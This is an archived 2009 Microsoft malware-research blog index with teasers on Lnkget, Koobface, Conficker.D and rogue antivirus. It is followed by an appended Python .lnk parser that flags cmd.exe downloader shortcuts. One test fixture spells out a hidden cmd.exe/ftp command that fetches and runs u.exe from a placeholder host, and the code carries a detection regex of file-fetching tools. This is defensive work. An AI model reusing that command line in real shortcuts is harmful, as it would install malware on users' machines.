Microsoft Malware Protection Center

Threat Research & Response Blog

March, 2009

  • Lnkget

    What is Lnkget? TrojanDownloader:Win32/Lnkget.* is a malicious Windows shortcut. Once executed, it is able to carry out actions like downloading new files (in this case malware). To be successful, it must use only executables that exist by default on any given system. However, the only executable that is really required is cmd.exe. All others can be carried by the shortcut itself. The executables must of course also run purely from the command line, without any user interface. One executable...
  • FakeXPA – The Journey Continues

    The big fish is back. Rogue security products have long been targeting Microsoft's Security Center and using other Microsoft imagery or logos to falsely lure users to buy and use their products. We now welcome Symantec, Webroot and Sophos to that esteemed crowd. The new avatar of Win32/FakeXPA (currently as Anti-virus-1 and may soon change) is taking over from the Antivirus2010 sub-variants and bringing on some more aggressive social engineering strategies. The malicious domain keeps on changing...
  • Spam - What the Doctor Ordered?

    Periodically I'll glance into my spam folder within Outlook and see if the messages there deserve this somewhat final resting place. I spotted a number of messages that have a very similar pattern in the message body when viewed in plain-text mode - see if you can spot the pattern too... c'mon, it'll be fun: Ok that was easy, but what I didn't mention until now is that the masked links above are for different Web sites. The subject lines vary as well and usually do not correlate to the...
  • Anti-Social Networking

    The family added to the March MSRT release is Win32/Koobface. This family is not just a worm, but a collection of different components that can each perform a different task. These include downloading, web hosting, password stealing, displaying popups and sending messages to contacts on various social network websites. Currently, the MMPC has observed targeted binaries for: • bebo.com • facebook.com • friendster.com • fubar.com • hi5.com • myspace.com • myyearbook.com • netlog.com • tagged.com...
  • Art History

    So the virus writer SPTH has returned to the scene, in some sense. He has written a DOS virus. And not just any DOS virus. This one is, wait for it, executable ASCII! Yay. His inspiration is apparently the EICAR anti-virus test file, however the only thing that they have in common is that they are both executable ASCII. The EICAR anti-virus test file is so much more than just executable ASCII, and SPTH's virus is so... not that. The EICAR anti-virus test file uses a more restrictive character...
  • Malware Du Jour

    I believe the Internet is pretty awesome. Full of win some might say. Controversial viewpoint I know, but I’m cool like that. Of the many varied side-effects of the Internet, I would argue one of the most interesting (if only from a social-science point of view) is the ability for the Internet to influence people on such a large scale; that trends take hold and spread at a much faster rate than they ever could have before. At one stage in our technological evolution television was the dominating...
  • Automated Vulnerability Analysis

    Last week at CanSecWest I had the pleasure to watch the MMPC’s security research team present on a technology we have been working on to speed the analysis of vulnerabilities. The motivation behind this work is to automate the otherwise laborious process of analyzing exploits: identifying malicious input bytes quickly, identifying how shellcode is executed and, basically, narrowing the search space for further manual analysis. The ability to respond quickly to an emerging threat event is...
  • SMMthing old, SMMthing new

    Another day arrives and, with it, another way to run code. This time, it's executing arbitrary code in System Management Mode (SMM) memory. That sounds kind of exciting, right? A SMM rootkit? Does that mean that we need an anti-malware scanner for SMM memory now? Or will it just fade away? All this and more will be answered shortly. But first... The technique was discovered last year by Loïc Duflot. Loïc has been researching and publishing work on SMM for several years already. The same technique...
  • Information about Worm:Win32/Conficker.D

    Over the past several months, Microsoft has received reports on 4 different variants of the Conficker worm, the latest being Worm:Win32/Conficker.D (also known as Downadup.C, and the subject of a number of recent press articles labeling this variant as Conficker.C; see Win32/Conficker for a chart distinguishing the variants). In response to the previous variants of Conficker (A/B/C), the industry has collaborated to organize a community-based effort to help mitigate and provide relief to the threat...
  • Forget About Internet Threads

    <sarcasm>Admittedly I was worried about it at first</sarcasm>, but now I can "forget about viruses, spyware, identity theft and other Internet threads", according to one rogue security site: Wow, who knew Internet threads (???) could be a problem? (Yes I know it’s a typo!) All of this seemed too good to be true, so I decided to download this one-of-a-kind super-duper threat killer and save myself. At the time of this writing, the installer was 'missing-in-action'. Suffice...
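The Lnkget item above describes a shortcut whose only required helper is cmd.exe, with the rest of the downloader carried in the shortcut's own argument string. As an added example (not code from the original post or from the MMPC), the following Python parses the string fields of a .lnk file per the MS-SHLLINK layout and flags that pattern. The detection heuristics, the list of fetch-capable tools, the 200-character threshold and the two sample shortcuts are constructed assumptions for illustration, not indicators published on this page.

```python
"""Parse Windows .lnk (Shell Link) files and flag the pattern the Lnkget
teaser describes: a shortcut targeting cmd.exe whose argument string carries
the whole downloader.  Offsets and flag bits follow MS-SHLLINK."""
import ntpath
import re
import struct

# LinkCLSID 00021401-0000-0000-C000-000000000046 as stored on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Assumed list of built-in command-line tools a cmd.exe one-liner can use to
# fetch or write a file; an illustration, not an indicator from the post.
FETCH_TOOLS = re.compile(r"(?i)\b(ftp|tftp|bitsadmin|certutil|mshta|cscript|wscript|powershell)\b")


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand, the LinkInfo local base path and the StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags, = struct.unpack_from("<I", data, 0x14)
    show_cmd, = struct.unpack_from("<I", data, 0x3C)
    out = {"show_command": show_cmd, "local_base_path": None}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:            # skip the shell item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        size, _hdr, li_flags, _vol, lbp_off = struct.unpack_from("<5I", data, pos)
        if li_flags & 0x1:                          # VolumeIDAndLocalBasePath present
            start = pos + lbp_off
            out["local_base_path"] = data[start:data.index(b"\x00", start)].decode("latin-1")
        pos += size

    def read_string() -> str:
        # StringData: 2-byte CountCharacters, then the characters (UTF-16LE if IsUnicode)
        nonlocal pos
        count, = struct.unpack_from("<H", data, pos)
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "latin-1")

    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")):
        out[key] = read_string() if flags & bit else None
    return out


def assess(lnk: dict) -> list:
    """Assumed heuristics for a self-contained cmd.exe downloader shortcut."""
    target = ntpath.basename(lnk["local_base_path"] or lnk["relative_path"] or "").lower()
    args = lnk["arguments"] or ""
    findings = []
    if target != "cmd.exe":
        return findings
    findings.append("target is cmd.exe")
    if ">" in args:
        findings.append("redirection writes a file to disk")
    if FETCH_TOOLS.search(args):
        findings.append("invokes a built-in tool that can fetch files")
    if len(args) > 200:
        findings.append("argument string is long enough to carry a script")
    if lnk["show_command"] == 7:                    # SW_SHOWMINNOACTIVE: console starts minimized
        findings.append("console window is hidden (minimized)")
    return findings


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Constructed test fixture: a minimal .lnk with Unicode StringData only."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + s(relative_path) + s("%SystemRoot%\\system32") + s(arguments)


# Constructed samples: one ordinary shortcut, one in the style the teaser describes.
BENIGN = build_lnk("..\\..\\Windows\\notepad.exe", "")
DOWNLOADER = build_lnk(
    "..\\..\\Windows\\system32\\cmd.exe",
    "/c echo open files.example.invalid>%TEMP%\\s&echo anonymous>>%TEMP%\\s"
    "&echo binary>>%TEMP%\\s&echo get u.exe>>%TEMP%\\s&echo bye>>%TEMP%\\s"
    "&ftp -s:%TEMP%\\s&start u.exe",
    show_command=7,
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("downloader", DOWNLOADER)):
        print(label, assess(parse_lnk(blob)))
```

Two caveats for anyone turning this into a hunting script: most real shortcuts store the target in the LinkTargetIDList, which this parser skips, so add shell-item decoding (or fall back to LinkInfo's LocalBasePath, which it does read) before trusting the target check; and since the payload lives in the argument string, redirection and argument length are the more durable tells than the target path alone.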